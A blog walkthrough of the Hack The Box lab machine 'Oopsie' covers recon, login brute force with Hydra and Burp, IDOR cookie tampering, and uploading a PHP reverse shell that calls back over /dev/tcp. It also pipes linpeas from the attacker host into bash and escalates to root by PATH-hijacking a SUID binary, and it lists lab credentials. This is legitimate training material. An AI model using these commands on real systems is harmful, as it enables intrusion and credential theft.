HTB Oopsie

Continuing the Intro boxes with my local infosec group the second box on the list is Oopsie. It’s listed as an Easy box, but for some people starting out that aren’t familiar with webapps they could get lost, especially figuring out the initial login foothold. It’s IP is 10.10.10.28 and you need the login pack for OpenVPN to reach it, you cant reach it with your normal one.

Alt

Recon

First we’re going to kick off a Nmap scan then checking the service versions and simple scripts on the found ports.

ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.28 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.28

We find TCP ports 22 and 80 open

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxxctowbmnTyFHK0XREQShvlp32DNZ7TS9fp1pTxwt4urebfFSitu4cF2dgTlCyVI6o+bxVLuWvhbKqUNpl/9BCv/1DFEDmbbygvwwcONVx5BtcpO/4ubylZXmzWkC6neyGaQjmzVJFMeRTTUsNkcMgpkTJXSpcuNZTknnQu/SSUC5ZUNPdzgNkHcobGhHNoaJC2StrcFwvcg2ftx6b+wEap6jWbLId8UfJk0OFCHZWZI/SubDzjx3030ZCacC1Sb61/p4Cz9MvLL5qPYcEm8A14uU9pTUfDvhin1KAEEDCSCS3bnvtlw1V7SyF/tqtzPNsmdqG2wKXUb6PLyllU/L
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLaHbfbieD7gNSibdzPXBW7/NO05J48DoR4Riz65jUkMsMhI+m3mHjowOPQISgaB8VmT/kUggapZt/iksoOn2Ig=
|   256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLh0LONi0YmlZbqc960WnEcjI1XJTP8Li2KiUt5pmkk
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux

Since we see port 80 open we immediately try feroxbuster to look for some web-directories in another tab.

feroxbuster

feroxbuster --url http://10.10.10.28 --scan-limit 3 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

Alt

We see a hit on http://10.10.10.28/cdn-cgi/login so when we visit the page we see a HTTP Form

Alt

Nikto

Another tool that you can use for web scanning is Nikto which performs tests against web servers. As you can see below Nikto also found the /cdn-cgi/login/ directory.

Alt

Other tools

  • GoBuster
    • gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e
  • wfuzz
    • wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.28/FUZZ=ls --hc 404
  • ffuf
    • ffuf -u http://10.10.10.28/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc 200
  • dirb and dirbuster are also some a good choice especially dirbuster if you are more comfortable with a GUI tool.

Also if we had BurpSuite running we could have saved time and seen a .js script called that would have given us a hint that the directory was there.

Alt

BurpSuite

Speaking of BurpSuite, you can attempt to bruteforce login pages using BurpSuite , but the community version timing is throttled to slower speeds which is a pain in the ass with huge wordlists. With Burp running you can send the request to Intruder, then in the Intruder->Position tab choose the password as the the target.

Alt

Paste in some passwords in the Intruder->Payloads tabs, go back to Positions and start the attack.

Alt

You should see successful results, for brevity we should be treating these boxes a a target company and reuse password from the previous box Archetype –MEGACORP_4dm1n!!

Hydra

So for simple HTTP Form POSTs another tool you can use is the mulitprotol cracking tool Hydra. which is included with Kali. We’re going to do the same process to figure out the syntax needed to crack the password. Without Burp available in Firefox you could open Devtools and check the network tab when attepting to login to see what kind request was sent so we can use it with Hydra. Alt

Hydra has the ability to flag success or fail on error codes, nomally some weblogin forms give you feedback saying the user or password was bad so instead of the S=302 we’re could have used something like F=invalid or something similar to whatever error showed , this login page does not show any errors, so we are going to use the 302 HTTP response code to flag as success since a valid login usually forwards you to the next page when logging in. The ^USER^ and ^PASS^ parameters will get from each line of the user and pasword file, since we can assume the userame is admin we’ll user the lowercase -l is we had a userlist to cycle we could have used -L users.txt . Since this is a simple HTTP Post form we’ll use the http-post-form along with the url. Again for brevity we used the already known password form the last box. otherwise a good wordlist may be used, but in real-world scenarios you could face lockouts or CAPTCHAs when trying to bruteforce logins and might trigger alerts to the webadmin that someones trying to bruteforce.

hydra -l admin -P passwords.txt 10.10.10.28 http-post-form "/cdn-cgi/login/index.php?:username=^USER^&password=^PASS^:S=302"

Alt

patator

Patator is a multi-protocol cracker also, we can do a similar crack and then filter out the 200 HTTP code so we just see the 302 redirect as a valid login patator http_fuzz url=http://10.10.10.28/cdn-cgi/login/index.php method=POST body='username=admin&password=FILE0' 0=passwords.txt -x ignore:code=200

Super admin

Alt

So now that we are logged in and we look around the links inside the panel, we notice the uploads page needs super admin rights. When online users normally log in there is a cookie or a user ID usually associated with your session. So, when we log into whoopsie and go to the uploads page , in the URL bar we see that our user ID=1. We want to try to switch out the number with a different number to see if we can get associated with a different account ID that may give us different privileges. Since Burp does well with adjusting and attacking parameter we are going to send this request to Intruder again.

Alt

Alt

In Burp you can set a sequential number payload to iterate from 1-50, so let’s try that and start the attack

Alt

We can see from the results that the number 30 has a different size then most of the responses Alt

Let’s try to mimic this with wfuzz, In bash lets create a file with the 1 through 50 in it printf '%s\n' {1..50} >numbers.txt to use for a wordlist but no need, wfuzz includes a simple number iterator too , we just need to supply the URL and the cookie of our admin user

wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ" 

Alt

as you see theres alot of the same length responses 3595 so lets filter those using --hh 3595

wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' --hh 3595 "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ" 

Alt

That gives us less results to go through, we can then test each with curl and grep for super, you see there is an ID in the returned html, lets go in Firefox DevTools and change our user id number to 86575 and refresh the page. When we go to the uploads link you will see we now have privileges to upload, so lets go ahead and upload a simple php reverse shell.

curl -s --cookie-jar cookies.txt  -H $'Cookie: user=34322; role=admin' 'http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=30' |grep super

Alt Alt Alt

Put this in a file and name it rev.php (use ifconfig tun0 to get yoru HTB VPN IP)

<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.15.93/9001 0>&1'");

open a netcat listener on port 9000 nc -lvnp 9000 When we upload our file we dont get any feedback where the file may be stores ,luckily in prior recon we saw the /uploads directory, so lets try navigating to http://10.10.10.28/uploads/rev.php, lucky for us or guess paid off, sometimes its difficult toi know the upload directory and sometimes even the filename gets randomized or hashed.

Alt

So now that we have our shell let’s upgrade to a better TTY shell using using python3

python3 -c  'import pty; pty.spawn("/bin/bash")'

looking around in the www directory we find a db.php file which hold some credentials 🙂 Let’s hope robert is lazy and reuses his password for SSH

USER

Alt

We find that these are indeed robert’s SSH credentials also, so we grab the user.txt

Alt

Then we do some recon using linpeas to get some situational awareness. Let’s start a python http server to host our linpeas and wget it. From attack box:

https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh & sudo python3 -m http.server 80

From victim:

curl http://10.10.15.93/linpeas.sh | bash

Alt

We dont find much useful information , although if you werent paying attention you might not have noticed the bugtracker group robert is in. so let’s figure out what he can do as a group member.

Alt Alt

We see that robert can execute a binary in the bin folder called bugtracker. When we execute it , it asks for a number i tried a few then tried 1 and it finally return some data. We run strings on the file to see if we can get any hints to what it’s doing strings /usr/bin/bugtracker

Alt Alt

We see that it’s just using cat to get the contents of a file in the /root/report directory. Since its not using a full absolute path to cat i.e. /bin/cat we can try to create an evil cat in our working directory. When calling the bugtracker program it’ll look in our current folder first

Alt

export PATH=~:$PATH
echo '/bin/bash' > cat
chmod +x cat

Alt

ROOT

Well looks like we dont have a root.txt yet :/ So starting with more recon lets check out the /root folder

Alt

so looking at the file I noticed it looked like it had contents, so figured I could use xxd to get the hex output of the file , and I found the flag :). then i figured out my aha moment when I wasnt using the full path for cat either…

Alt Alt

but… looking further in the root directory, we find a .config folder that has a fillezilla.xml config, we see more credentials , much like the last box, we’re probably going to use these credentials on the next box…

Alt

LOOT

  • admin: MEGACORP_4dm1n!!
  • robert:M3g4C0rpUs3r!
  • ftpuser:mc@F1l3ZilL4
Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *